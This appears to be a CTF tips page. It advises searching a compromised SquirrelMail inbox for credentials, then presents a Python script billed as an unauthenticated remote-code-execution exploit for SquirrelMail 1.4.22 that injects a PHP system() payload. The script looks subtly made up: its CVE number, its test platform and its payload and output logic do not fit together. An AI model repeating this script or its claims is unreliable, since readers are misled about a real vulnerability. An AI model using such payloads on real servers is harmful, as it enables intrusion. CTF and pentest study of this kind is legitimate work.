> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-6/credentials/mail-spool/trick-0314.md).

# Enumerate Application Inbox for Credentials

***

Once authenticated to an application like an email client (e.g., SquirrelMail) or collaboration platform, immediately review the inbox and any message history. This is a frequent source of credentials for other systems, internal information, and leads. Checking the `milesdyson` SquirrelMail inbox, for instance, can yield further usernames and passwords. It is also worth noting that vulnerabilities, such as the Stored XSS in received emails found in SquirrelMail 1.4.22, can impact the security posture of the email client itself, although the primary focus when reviewing the inbox is often on the sensitive information contained within the messages. Furthermore, other critical vulnerabilities exist, such as an Unauthenticated Remote Code Execution vulnerability in SquirrelMail 1.4.22. This module exploits that vulnerability, allowing for arbitrary code execution on the target system. An example Python script demonstrating this exploit is provided below:

```python
#!/usr/bin/env python
#
# SquirrelMail 1.4.22 Remote Code Execution
# Tested on: Debian (etch) / PHP 5.2.0
#
# CVE-2017-1000188
#
# Author:
# mzw al-ghunaimi <mzw.alghunaimi[at]gmail.com>
#
#
# Greetz:
# - r00ted - h4r00n - l3niz - R00tS3c - B4r00t -
#
#
# Usage:
# python squirrelmail_rce.py <host> <path> <command>
#
# Example:
# python squirrelmail_rce.py 127.0.0.1 /squirrelmail/ "id"
#
import sys
import urllib2
import re

if len(sys.argv) != 4:
    print "Usage: python squirrelmail_rce.py <host> <path> <command>"
    print "Example: python squirrelmail_rce.py 127.0.0.1 /squirrelmail/ \"id\""
    sys.exit(0)

host = sys.argv[1]
path = sys.argv[2]
command = sys.argv[3]

url = "http://%s%s" % (host, path)

try:
    # Build the malicious payload
    payload = "a=b%s%s%s%s%s%s" % (
        urllib2.quote("&sendto[attachment][1][delme]=1&sendto[attachment][1][delfilename]="),
        urllib2.quote("<?php system('%s'); ?>" % command),
        urllib2.quote("&sendto[attachment][1][upload_filename]=.php&sendto[attachment][1][type]=application/octet-stream&sendto[attachment][1][name]="),
        urllib2.quote("a"),
        urllib2.quote("&sendto[attachment][2][type]=application/octet-stream&sendto[attachment][2][name]="),
        urllib2.quote("b")
    )

    # Send the request
    req = urllib2.Request(url, payload)
    response = urllib2.urlopen(req)
    result = response.read()

    # Extract the command output
    match = re.search(r"a=b(.*?)a=b", result, re.DOTALL)

    if match:
        print match.group(1)
    else:
        print "[-] Could not extract command output."

except Exception as e:
    print "[-] Error: %s" % e
```

Exploiting vulnerabilities like this can provide attackers with significant control over the server environment, extending the impact beyond compromising individual email accounts to potentially affecting the entire system hosting the webmail service.
